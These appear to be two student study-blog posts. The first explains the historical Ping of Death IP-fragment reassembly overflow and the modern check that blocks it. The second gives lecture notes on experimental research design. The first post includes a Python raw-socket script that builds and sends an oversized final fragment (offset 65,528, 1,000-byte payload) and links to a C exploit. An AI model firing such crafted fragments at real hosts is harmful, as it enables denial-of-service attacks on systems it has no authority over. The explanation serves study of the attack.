
FIT5108 – DoS Reading Unit Part 3

This week I will begin a detailed review of each of the attack methods introduced in Week 1’s post, starting with one of the oldest DoS attacks: the Ping of Death.

I incorrectly listed this under ICMP attacks in a previous post; the Ping of Death actually exploits the process of IP packet reassembly.

The disassembly and reassembly process of data communication

We can see above that after being received via the communication medium (e.g. a Cat6 cable), the Ethernet frames are unwrapped and we find IP packets inside. The maximum size of an IP packet according to the standard specification (http://tools.ietf.org/html/rfc791) is 65,535 bytes. The maximum payload of a standard Ethernet frame (http://standards.ieee.org/about/get/802/802.3.html) is 1,500 bytes. This means that large IP packets must be split across multiple Ethernet frames and the receiver must reassemble them. To keep track of reassembly, each IP fragment carries a fragment offset field.
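
To make those numbers concrete, here is a quick back-of-the-envelope sketch in Python of how many Ethernet frames a maximum-size IP packet gets split across. The 20-byte IP header with no options is my assumption, not something stated in the figure.

    import math

    MTU = 1500             # maximum payload of a standard Ethernet frame (bytes)
    IP_HEADER = 20         # IP header without options (assumption)
    MAX_IP_PACKET = 65535  # maximum IP packet size per RFC 791 (header + data)

    # Each fragment is itself an IP packet, so it re-carries a header; the data
    # it can hold is the MTU minus the header, rounded down to a multiple of 8
    # because fragment offsets are counted in 8-byte blocks.
    data_per_fragment = (MTU - IP_HEADER) // 8 * 8   # 1480 bytes
    total_data = MAX_IP_PACKET - IP_HEADER           # 65,515 bytes of payload

    fragments = math.ceil(total_data / data_per_fragment)
    print(f"{total_data} bytes of data -> {fragments} Ethernet-sized fragments")
    # 65515 bytes of data -> 45 Ethernet-sized fragments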

The fragment offset effectively says, “I start with the 1000th byte of the complete IP packet, put me after the 999th byte.” Given that the Ethernet protocol only allows frames of up to 1,500 bytes and the maximum IP packet is 65,535 bytes, you might expect the IP protocol to stop a fragment from declaring a starting position so close to that limit that a frame’s worth of data could not fit. However, the IP protocol actually allows a fragment to declare an offset of 65,528 bytes, leaving room for only 7 more bytes within the limit!
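
The reason 65,528 is the magic number lies in how the offset field is encoded: it is a 13-bit field that counts in 8-byte blocks (RFC 791), so its largest value lands just short of the packet-size limit. A small sketch of the arithmetic:

    # The fragment offset field in the IP header is 13 bits wide and counts
    # in units of 8 bytes, which is why the largest claimable starting
    # position is 65,528 rather than something safely below 65,535.
    OFFSET_FIELD_BITS = 13
    UNIT = 8  # bytes per offset unit

    max_field_value = 2 ** OFFSET_FIELD_BITS - 1   # 8191
    max_byte_offset = max_field_value * UNIT       # 65,528
    print(max_byte_offset)                         # 65528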

So, if an attacker sends an IP packet of the maximum allowable size of 65,535 bytes, it will be broken up into Ethernet frames (Ethernet being the most common data link protocol). A ping of death occurs when the attacker modifies the last IP fragment to carry an offset of 65,528 bytes but attaches more than 7 bytes of subsequent data. The receiver will then try to reassemble an IP packet that exceeds the 65,535-byte limit.

Because data communication and packet reassembly must be very fast, older operating systems performed no check to ensure the reassembled IP packet did not exceed the memory allocated for it. The result was a buffer overflow, crashing or destabilising the system.

On any post-1998 system a check is performed to ensure that the sum of the Fragment Offset and Total Length fields of an IP fragment does not exceed 65,535 bytes. This is obviously an old and now mostly non-exploitable attack, but it is worth reviewing the type of exploits that have existed in the past, as they provide some insight into future vulnerabilities.
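
A simplified sketch of that reassembly check, consistent with the description above (it ignores header lengths for clarity, and the function and parameter names are mine, not taken from any particular kernel):

    MAX_IP_PACKET = 65535  # maximum size of an IP packet in bytes (RFC 791)

    def fragment_within_limit(fragment_offset: int, fragment_data_len: int) -> bool:
        """Return True if this fragment's data still fits inside a legal IP packet.

        fragment_offset:   where the fragment claims its data starts, in bytes
        fragment_data_len: how many bytes of data the fragment actually carries
        """
        return fragment_offset + fragment_data_len <= MAX_IP_PACKET

    print(fragment_within_limit(65528, 7))     # True  -> last legal sliver of data
    print(fragment_within_limit(65528, 1000))  # False -> ping of death, discard it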

A program written in C by Bill Fenner implementing a ping of death using ICMP can be found here: http://insecure.org/sploits/ping-o-death.html.

Any program implementing a ping of death attack must be able to inject modified packets/frames into a network interface. This capability is also required by a number of other DoS attacks, so I will look at writing a basic script in Python using the PyCap library: http://pycap.sourceforge.net/, although it does require Python 2.3 :(.
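
Since PyCap is tied to such an old Python, here is a rough alternative sketch of the same packet-injection idea using only the Python 3 standard library’s raw sockets. Root privileges are required, the addresses and payload size are placeholders, and this is only for experimenting against hosts you control.

    import socket
    import struct

    DEST = "192.0.2.1"  # placeholder destination (TEST-NET-1 documentation range)
    SRC = "192.0.2.2"   # placeholder source address

    def build_ip_header(frag_offset_bytes: int, more_fragments: bool, payload_len: int) -> bytes:
        version_ihl = (4 << 4) | 5          # IPv4, 5 x 32-bit words = 20-byte header
        total_length = 20 + payload_len
        flags = 0x1 if more_fragments else 0x0
        # Flags occupy the top 3 bits; the 13-bit offset counts 8-byte blocks.
        flags_fragment = (flags << 13) | (frag_offset_bytes // 8)
        return struct.pack(
            "!BBHHHBBH4s4s",
            version_ihl, 0, total_length,
            0x1234,                          # identification (arbitrary)
            flags_fragment,
            64, socket.IPPROTO_ICMP,
            0,                               # checksum left at 0 in this sketch
            socket.inet_aton(SRC), socket.inet_aton(DEST),
        )

    payload = b"A" * 1000                    # far more than the 7 bytes that legally fit
    packet = build_ip_header(65528, False, len(payload)) + payload

    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)  # we supply the IP header
        s.sendto(packet, (DEST, 0))

The key point is that the attacker writes the fragment offset and payload length directly into the header, bypassing the operating system’s normal fragmentation logic.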


FIT5185 – IT Research Methods Week 3

Experiments were the topic of week 3’s lecture, presented by David Arnott. We started with a classification of scientific investigations:

  • Descriptive studies
  • Correlation studies
  • Experiments

Importantly, the anchor of these investigations is the research question.

Terms and concepts were covered in the next sub-section:

  • Subject (by law in Australia, “participant” when people are the subjects) – the target of your experimentation.
  • Variables (independent, dependent, intermediate, extraneous) – these are largely self-explanatory from their dictionary definitions.
  • Variance/factor models – aim to predict an outcome from adjustment of predictor (independent?) variables within an atomic time frame. That is my loose interpretation.
  • Process models – aim to explain how outcomes develop over time (the difference between variance and process models appears moot and, I feel, somewhat irrelevant).
  • Groups -> experimental group and control group -> ensuring group equivalence.
  • Hypothesis – a prediction about the effect of manipulating independent variables on dependent variables. One-tailed, two-tailed, and null hypotheses.
  • Significance – a difference between two descriptive statistics large enough that it cannot reasonably be attributed to chance.
  • Reliability – can the research method be replicated by another researcher?
  • Internal validity – how much the manipulation of the independent variable is responsible for the results in the dependent variable.
  • External validity – can the results be generalised to entities outside of the experiment?
  • Construct validity – the extent to which the measures used in the experiment actually measure the construct.

Experimental Design followed:

  • Between-subjects vs within-subjects design -> whether each subject is exposed to only one condition or to all of them.
  • After-only vs before-after design -> at which stages the dependent variables are measured.
  • Statistical tests must reflect the experimental design:

 

Statistical tests to reflect the experimental design – source: week 3 lecture notes
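
As a small illustration of that point (my own example, not from the lecture notes): the same two columns of numbers call for different tests depending on whether they came from two independent groups or from the same subjects measured twice. A sketch using SciPy:

    # Illustration only: the choice of test follows the design, not the data.
    # ttest_ind assumes two independent groups (between-subjects design);
    # ttest_rel assumes paired measurements (within-subjects design).
    from scipy import stats

    group_a = [12.1, 11.4, 13.0, 12.7, 11.9]   # made-up scores
    group_b = [13.2, 12.8, 13.9, 13.1, 12.6]   # made-up scores

    between = stats.ttest_ind(group_a, group_b)   # two separate groups of subjects
    within = stats.ttest_rel(group_a, group_b)    # the same subjects, before/after

    print("between-subjects p-value:", between.pvalue)
    print("within-subjects p-value: ", within.pvalue)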

When creating an experimental design, it seems like a good idea to simply make a checklist.

The coffee/caffeine example covered next seemed a bit odd, as it assumed that coffee and caffeine are the same thing. I recall the same type of assumption being made in regard to THC and marijuana, which was later found to be fundamentally flawed. I did not understand the decision support system example at all, so I was not really able to extrapolate much understanding from the two examples covered.